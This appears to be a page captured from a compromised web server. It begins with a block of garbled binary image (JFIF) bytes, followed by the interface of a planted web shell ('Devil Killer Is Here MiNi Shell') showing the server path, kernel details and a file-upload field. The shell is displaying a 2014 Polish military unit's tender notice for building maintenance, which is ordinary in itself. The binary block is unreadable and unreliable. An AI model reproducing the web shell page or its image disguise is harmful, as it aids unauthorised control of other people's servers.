JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140312/52437-N-2014.html

<p class="kh_header"><b>Giżycko: ROBOTA BUDOWLANA W ZAKRESIE KONSERWACJI BUDYNKÓW NR 4, 18, 22
NA TERENIE JW. 2031 W BROŻÓWCE, GM. KRUKLANKI</b><br>
<b>Numer ogłoszenia: 52437 - 2014; data zamieszczenia: 12.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl., www.bip.mon.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTA BUDOWLANA W ZAKRESIE KONSERWACJI BUDYNKÓW NR 4, 18, 22
NA TERENIE JW. 2031 W BROŻÓWCE, GM. KRUKLANKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:Konserwacja budynku polegająca na wymianie pokrycia dachowego 
z dachówki na blachodachówkę z wymianą obróbek blacharskich w budynku nr 4 JW. 2031 w Brożówce gm. Kruklanki.
Konserwacja budynku polegająca na wymianie stolarki okiennej i drzwiowej, naprawie elewacji zewnętrznej i dachu oraz naprawie podłóg i malowaniu wewnętrznym w budynku nr 18 oraz wymiana drzwi w budynku nr 22 JW. 2031 w Brożówce gm. Kruklanki.
2. Zakres opracowania BUDYNEK NR 4
1. Rozebranie obróbek blacharskich z blachy nie nadającej się do użytku.
2. Rozebranie rynien z blachy ocynkowanej nie nadającej się do użytku fi 15cm.
3. Rozebranie rur spustowych z blachy ocynkowanej nie nadającej się do użytku 
fi 12cm.
4. Rozbiórka pokrycia z dachówki. 
5. Rozebranie części deskowania dachu z desek na styk.
6. Rozebranie ołacenia dachu o odstępie łat co 16cm.
7. Demontaż desek okapowych i wiatrowych.
8. Obicie tynków zewnętrznych.
9. Rozebranie daszków nad wejściem do budynku.
10. Wykucie okien drewnianych 2,1x1,5 i 1,5x1,5m.
11. Wykucie z muru drzwi i ościeżnic drewnianych.
12. Demontaż parapetów zewnętrznych z blachy się nadającej się do użytku.
13. Wykucie parapetów wewnętrznych lastrykowych.
14. Wykucie krat okiennych metalowych.
15. Wykucie z podestów wycieraczek metalowych.
16. Wywiezienie gruzu samochodami samowyładowczymi na odległość do 20km.
17. Wywóz elementów metalowych i drewnianych pochodzących z rozbiórki 
samochodami skrzyniowymi do magazynu SOI na odległość do 20km.
18. Uzupełnienie deskowania połaci dachu.
19. Ołacenie dachu łatami 38x50mm pod blachę dachówkopodobną.
20. Pokrycie połaci dachu 1x papą.
21. Pokrycie dachu blachą dachówkopodobną powlekaną o grubości min.0,5mm.
22. Ułożenie gąsiorów systemowych dla dachów krytych blachodachówką z blachy 
powlekanej grubości min. 0,5mm.
23. Murowanie kominów wieloprzewodowych z cegły pełnej.
24. Murowanie kominów wieloprzewodowych z cegły klinkierowej ponad połacią 
dachu.
25. Spoinowanie kominów z cegły klinkierowej.
26. Wykonanie czapek kominowych gr. 7cm z betonu B-20.
27. Sprawdzenie i odgruzowanie istniejących kominów.
28. Wykonanie spadków pod obróbki blacharskie występów ścian szczytowych.
29. Wykonanie obróbki blacharskiej z blachy powlekanej o szer. 25cm pasa 
nadrynnowego.
24. Wykonanie obróbek blacharskich z blachy powlekanej o szer. ponad 25cm: 
obróbka styku murku ogniowego z połacią dachu, obróbka murku ogniowego, 
obróbka daszku nad wejściem do budynku, obróbka występów okapowych przy 
ścianach szczytowych, obróbka kominów, obróbka wywietrzaka dachowego.
25. Montaż rynien dachowych półokrągłych z blachy ocynkowanej gr. 0,55mm 
fi 15cm z gotowych elementów.
26. Osadzenie rur spustowych okrągłych z blachy ocynkowanej gr. 0,55mm fi 12cm 
z gotowych elementów.
27. Montaż daszków systemowych w płyt z poliwęglanu komorowego gr.10mm 
na konstrukcji stalowej zabezpieczonej antykorozyjnie.
28. Uzupełnienie schodów zewnętrznych średnio o 5cm wejść do budynku betonem 
B-25.
29. Wykonanie odejścia - odwodnienia z wycieraczek schodowych.
30. Uzupełnienie tynków zewnętrznych na ścianach kategorii III.
31. Malowanie farbami emulsyjnymi przeznaczonymi do malowania elewacji nowych tynków zewnętrznych. 
32. Osadzenie wycieraczek stalowych ocynkowanych zgrzewanych, o wielkości 
oczka 35x20mm i wysokości 30mm.
33. Osadzenie okna PCV dwuskrzydłowego rozwieranego i rozwierano-uchylnego 
1,50x1,50m w kolorze białym z profila pięciokomorowego, z szybą zespoloną 
o właściwościach termicznych K< 1.1 - 8szt.
34. Osadzenie okna PCV trzyskrzydłowego rozwieranego i rozwierano-uchylnego 
2,10x1,50m w kolorze białym z profila pięciokomorowego, z szybą zespoloną 
o właściwościach termicznych K< 1.1 - 5szt.
35. Osadzenie drzwi aluminiowych zewnętrznych (ciepłych) jednoskrzydłowych wraz z ościeżnicą, progiem, klamką, dwoma zamkami wpuszczanymi z wkładką 
      patentową, kolor i wzór do uzgodnienia z Inwestorem, o wym. 2,0x1,00m -2szt.
36. Obmurowanie otworów okiennych i drzwiowych cegłą.
37. Ochrona narożników aluminiowych na ościeżach.
38. Uzupełnienie tynku zewnętrznego na ościeżach okiennych i drzwiowych.
39. Wykonanie tynku wewnętrznego kat. III na ościeżach okiennych i drzwiowych.
40. Wykonanie gładzi gipsowych dwuwarstwowych na tynkach jw.
41. Osadzenie parapetów zewnętrznych z blachy ocynkowanej gr.0,55mm.
42. Montaż parapetów z konglomeratu gr.3cm szer.30cm i długości 150cm - 8szt.
43. Montaż parapetów z konglomeratu gr.3cm szer.30cm i długości 210cm - 5szt.
44. Dwukrotne malowanie wewnętrznych szpachlowanych ścian farbami 
emulsyjnymi.
45. Wymiana opraw rtęciowych oświetlenia zewnętrznego na wysięgnikach, oprawa 
rtęciowa OUR 250W, lampa rtęciowa LRF 250W.
46. Wymiana wysięgników oświetlenia zewnętrznego, mocowanego na ścianie 
1-ramiennych, do 15kg - wysięgnik zabezpieczony antykorozyjnie.
47. Wymiana wyłącznika, przełącznika 1-biegunowego lub przycisku 10A, 
na podłożu ceglanym.
48. Wymiana przewodów w rurach wysięgnika, wysokość latarni 10m, 1 oprawa 
na wysięgniku DY 450/750 1x1,5mm2
49. Demontaż wsporników instalacji odgromowej i przewodów wyrównawczych 
na ścianie murowanej.
50. Demontaż przewodów wyrównawczych i odgromowych z płaskownika 
o przekroju do 120mm2 mocowanych na wspornikach na ścianie w ciągu 
pionowym.
51. Demontaż przewodów wyrównawczych i odgromowych z płaskownika lub pręta 
mocowanych na dachu stromym.
52. Demontaż osłony odprowadzającego przewodu odgromowego na podłożu 
drewnianych i ceglanym.
53. Osadzenie wsporników naciągowych z jedną złączką przelotową naprężającą 
na ścianie z cegły.
54. Montaż zwodów pionowych inst. odgromowej naprężanych z pręta ocynkowanego o gr. 8mm na uprzednio zainstalowanych wspornikach na ścianie.
55. Połączenie pręta o średnicy 8mm na dachu za pomocą złączy skręcanych - 
złącze uniwersalne krzyżowe.
56. Montaż złączy rynnowych naprężających i kontrolnych w instalacji odgromowej - złącze do rynny dach.
57. Osadzenie złączy kontrolnych z połączeniem drut-płaskownik w instalacji 
odgromowej lub przewodów wyrównawczych.
58. Montaż osłon o dł. 2m przewodów uziemiających na podłożu z cegły.
59. Montaż zwodów pionowych z pręta ocynkowanego fi 8mm oraz iglic z ostrzem 
odgromowym z pręta fi 8mm na dachu stromym. 
60. Wykonanie pomiarów instalacji odgromowej.
BUDYNEK NR 18
1.Wykucie z muru drzwi drewnianych o powierzchni ponad 2m2.
2.Wykucie z muru okna drewnianego o powierzchni ponad 2m2.
3.Wykucie z muru okna drewnianego o powierzchni do 2m2.
4.Demontaż parapetów oraz obróbki daszku z blachy nie nadającej się do obróbki.
5.Rozebranie pokrycia dachu z 2 warstw papy.
6.Rozebranie opaski wokół budynku z płyt chodnikowych.
7.Rozebranie obrzeży trawnikowych wokół opaski budynku.
8.Skucie posadzki betonowej wewnątrz budynku oraz nawierzchni betonowej przed budynkiem o średniej grubości 5cm.
9.Obicie tynków wewnętrznych z powierzchni ścian i sufitów.
10.Wywóz elementów metalowych samochodami skrzyniowymi do magazynu SOI 
w Giżycku.
11.Wywóz gruzu samochodami samowyładowczymi na odległość do 20km.
12.Osadzenie drzwi aluminiowych zewnętrznych (ciepłych) dwuskrzydłowych wraz 
z ościeżnicą i progiem, klamką, dwoma zamkami wpuszczanymi z wkładką patentową i plombowniczką, kolor i wzór do uzgodnienia z Inwestorem, o wym. 2,1x1,53m -1szt.
13.Osadzenie drzwi aluminiowych zewnętrznych (ciepłych) jednoskrzydłowych wraz z ościeżnicą, progiem, klamką, dwoma zamkami wpuszczanymi z wkładką patentową i plombowniczką, kolor i wzór do uzgodnienia z Inwestorem, o wym. 2,1x1,00m -1szt.
14.Osadzenie parapetów zewnętrznych z blachy ocynkowanej gr.0,55mm.
15.Osadzenie okna PCV dwuskrzydłowego rozwieranego i rozwierano-uchylnego 1,40x1,56m w kolorze białym z profila pięciokomorowego, z szybą zespoloną 
o właściwościach termicznych K 1.1 - 1szt.
16.Osadzenie nieotwieranego okna PCV stałego 0,52x2,30m w kolorze białym 
z profila pięciokomorowego, z szybą zespoloną matową o właściwościach termicznych K 1.1 - 1szt.
17.Uzupełnienie ściany cegłami na zaprawie cementowo-wapiennej - zmniejszenie otworu okiennego cegłami.
18.Wykonanie ręczne tynków wewnętrznych kat. III na ścianach wraz
z osadzeniem narożników i kratek wentylacyjnych.
19.Wykonanie ręczne tynków wewnętrznych kat. III na sufitach.
20.Dwukrotne malowanie ścian i sufitów farbą emulsyjną wraz z dwukrotnym gruntowaniem.
21.Malowanie lamperii dwukrotnie farbą olejną wraz z dwukrotnym szpachlowaniem w pomieszczeniu magazyniera na wysokość 150cm,
w pomieszczeniu magazynowym na wysokość 200cm.
22.Docieplenie posadzki styropianem FS20 o grubości 2cm.
23.Izolacja posadzki z folii posadzkowej.
24.Zbrojenie posadzki siatką stalową.
25.Wykonanie posadzki cementowej gr.5cm w pomieszczeniu magazynowym 
oraz 4cm w pomieszczeniu magazyniera.
26.Ułożenie posadzki z płytek z gresu antypoślizgowych i mrozoodpornych.
27.Wykonanie cokolika z gresu na wysokość 15cm.
28.Docieplenie dachu styropianem lamelowanym jednostronnie papą podkładową na osnowie z włókna szklanego FS20 gr.10cm.
29.Pokrycie dachu dwoma warstwami papy termozgrzewalnej.
30.Osadzenie na dachu murłat 10x10cm do mocowania obróbek blacharskich 
i rynhaków.
31.Montaż rynny dachowej półokrągłej o średnicy 10cm z blachy ocynkowanej gr.0,55mm.
32.Montaż rury o średnicy 8cm z blachy ocynkowanej gr.0,55mm.
33.Wykonanie obróbek daszku, pasu nadrynnowego oraz komina z blachy ocynkowanej gr. 0,55mm. 
34.Wykonanie ręczne tynków zewnętrznych kat. III pod daszkiem.
35.Przetarcie istniejących tynków zewnętrznych ścian budynku i komina.
36.Dwukrotne malowanie ścian zewnętrznych oraz komina farbą emulsyjną elewacyjną kolor farby do uzgodnienia z Inwestorem.
37.Dwukrotne malowanie farbą olejną krat okiennych.
38.Wykonanie opaski o szerokości 80cm i gr.15cm z betonu B20 wokół budynku.
39.Ułożenie chodnika przed budynkiem z polbruku gr.6cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem.
40.Demontaż umywalki.
41.Demontaż podejścia odpływowego fi 50mm.
42.Demontaż rurociągu kanalizacyjnego z PCV na ścianie budynku fi 50mm.
43.Osadzenie umywalki z syfonem.
44.Montaż postumentu pod umywalkę.
45.Wykonanie rurociągu z rur PCV fi 50 do umywalki.
46.Demontaż oprawy żarowej przykręcanej.
47.Demontaż łączników instalacyjnych o natężeniu prądu do 10A 1-biegunowych
z 1 wylotem.
48.Demontaż gniazda wtyczkowego natynkowego 2+0 bieguny.
49.Demontaż gniazda wtyczkowego natynkowego 3+0 bieguny.
50.Demontaż tablicy bezpiecznikowej o pow. do 0,5m2 demontaż tablicy 
ze złożeniem na odkład do ponownego montażu.
51.Wykucie bruzd dla przewodów wtynkowych w gipsie, tynku lub gazobetonie.
52.Przebicie otworów w ścianach lub stropach, w cegle, długości przebicia do 
	2 cegieł fi 25mm.
53. Ułożenie przewodów kabelkowych YDYp 3x1,5 750V układane p.t. w gotowych bruzdach na podłożu innym niż betonowe o przekroju do 7,5mm2.
54. Ułożenie przewodów kabelkowych YDYp 3x2,5 750V układane p.t. w gotowych 
bruzdach na podłożu innym niż betonowe o przekroju do 7,5mm2.
55. Przygotowanie podłoża pod osprzęt instalacyjny - ślepe otwory pod 
mocowanie na zaprawie cementowej lub gipsowej w cegle.
56. Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 
2-biegunowe 16A 2,5mm2 bryzgoszczelne.
57. Montaż na gotowym podłożu łączników i przycisków bryzgoszczelnych 
z podłączeniem, łącznik z tworzywa sztucznego, 1-biegunowy, przycisk 
przykręcany.
58. Montaż puszek instalacyjnych podtynkowych Fi 80 4-otworowe z pierścieniem 
obciążającym.
59. Montaż do gotowego podłoża gniazd wtyczkowych z podłączeniem, przewód 
do 2,5mm2 bryzgoszczelne 3P+Z 16A, przykręcane.
60. Ułożenie przewodów płaskich w tynku na podłożu innym niż beton, przekrój żył 
do 24mm2 YDYp 5x2,5 750V.
61. Osadzenie na gotowym podłożu opraw świetlówkowych z blachy stalowej 
z kloszem z tworzyw sztucznych lub rastrem metalowym względnie z tworzyw 
sztucznych, z podłączeniem, przykręcane 2x36W końcowe.
62. Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 1-fazowy.
63. Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 3-fazowy.
64. Badania i pomiary skuteczności zerowania pierwszy i następne pomiary.
65. Wykonanie pasów tynków zwykłych kat. III za murowanych bruzdach na 
murach z cegieł lub ścianach z betonu, bruzdy z przewodami elektrycznymi 
o szerokości do 100mm.
66. Montaż tablicy rozdzielczej pochodzącej z demontażu i złożonej na odkład - 
bez kosztu tablicy.
67. Demontaż wsporników odstępowych instalacji odgromowej na dachu płaskim 
na papie na betonie.
68. Demontaż przewodów wyrównawczych i odgromowych z płaskownika lub 
pręta mocowanych na dachu płaskim.
69. Montaż uziomu powierzchniowego w wykopie o głęb. Do 60cm w gruncie 
kat. III.
70. Montaż przewodów odprowadzających instalacji odgromowej na budynku, 
podłoże z cegły, mechaniczne wykonanie otworu, bednarka 120mm2.
80. Łączenie przewodów uziemniających przez spawanie w wykopie - bednarka 
120mm2.
81. Montaż osłon przewodów uziemniających o długości do 2m na podłożu 
z cegły.
82. Montaż wsporników dla instalacji odgromowej naprężanej na ścianach
i dachach, naciągane z 1 złączką przelotową naprężającą, na ścianie z cegły.
83. Montaż wsporników dla instalacji odgromowej naprężnej na ścianach
i dachach, przelotowe pośredniczące na ścianie - cegła.
84. Montaż zwodów poziomych inst. odgromowej naprężanych z pręta ocynk. 
o średnicy 8mm na uprzednio zainstalowanych wspornikach na dachu płaskim.
85. Montaż zwodów pionowych inst. odgromowej naprężanych z pręta ocynk. 
o średnicy 8mm na uprzednio zainstalowanych wspornikach na ścianie.
86. Łączenie pręta o średnicy do 10mm na dachu za pomocą złączy skręcanych 
uniwersalnych krzyżowych.
87. Montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub
przewodów wyrównawczych.
88. Montaż złączy kontrolnych z podłączeniem drut-płaskownik w instalacji 
odgromowej lub przewodów wyrównawczych.
89. Wykopanie pomiarów instalacji odgromowej.
BUDYNEK NR 22
1.Wykucie z muru ościeżnic i drzwi stalowych o powierzchni ponad 2m2.
2.Wywóz elementów metalowych samochodami skrzyniowymi do magazynu SOI 
w Giżycku.
3.Osadzenie drzwi wejściowe metalowe spełniające wymagania klasy odporności nie niższej niż RC 4 określone w Polskiej Normie PN-EN1627, blokowane na 4 krawędziach, zabezpieczone przed wyłamaniem od strony zawiasów, posiadający element samozatrzaskowy uniemożliwiający pozostawienie pomieszczenia otwartego, samozamykacz oraz dodatkowo wyposażone
w wizjer, zamek mechaniczny szyfrowy, co najmniej klasy B według Polskiej Normy PN-EN1300 co najmniej trzytarczowy, o cichym przesuwie, posiadający min.100 podziałek na pokrętle i skali nastawień, przy której w przypadku każdej tarczy zamek trzytarczowy nie otworzy się, jeżeli pokrętło jest przekręcone więcej niż o 1 kreskę podziałki po obu stronach właściwej kreski podziałki,
a w przypadku zamka czterotarczowego wartość ta wynosi 1m25. Zamiana kombinacji powinna być blokowana i uaktywniana kluczem od tyłu obudowy zamka. Zamek powinien być odporny na manipulację przez eksperta, również przy użyciu specjalistycznych narzędzi, przez okres 20 roboczogodzin. Zamek powinien być zabezpieczony przed działaniem destrukcyjnym, w tym przed przewierceniem i prześwietleniem (atakiem) radiologicznym (promieniowanie
z radioaktywnego źródła nieprzekraczającego równowartość 10 curie, co 60
z odległości 760mm przez 20 godzin). Zmiana kombinacji powinna być blokowana i uaktywniana kluczem od tyłu obudowy zamka. Drzwi powinny być wyposażone w dwa komplety kluczy niezbędne do stawiania szyfru. Zarządzenie dopuszcza stosowanie zamka elektronicznego szyfrowego, 
co najmniej klasy B według Polskiej Normy PN-EN 1300 pod warunkiem,
że zamek spełnia te same wymagania co zamek mechaniczny szyfrowy oraz nie generuje sygnałów, które mogą być wykorzystane do otwarcia zamka przez okres 20 roboczogodzin. 
4.Zamurowanie bruzd po wykuciu ościeżnic w ścianach z cegieł o przekroju ? x ? cegły.
5.Wykucie pasów tynków zwykłych kategorii III na zamurowanych bruzdach 
w ścianach z cegieł - pas o szerokości do 15cm.
6.Dwukrotne malowanie farbą olejną pasów tynków wraz z przygotowaniem podłoża, dwukrotnym szpachlowaniem i szlifowaniem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy. Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 2 500,00 zł. (słownie: dwa tysiące pięćset zł). Wadium musi być wniesione przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub w kilku następujących formach: pieniądzu;poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;gwarancjach bankowych;gwarancjach ubezpieczeniowych;poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. Nr 109, poz. 1158, z późn. zm.. Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez: NBP O/O Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium w post. nr 23/2014 - robota budowlana w zakresie konserwacji budynków nr 4, 18, 22 na terenie JW. 2031 w Brożówce. Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem 2.Zwrot i zatrzymanie wadium. Zamawiający zwraca niezwłocznie wadium, jeżeli dokona wyboru oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem ust. 4a., unieważni postępowanie o udzielenie zamówienia. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału 
w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
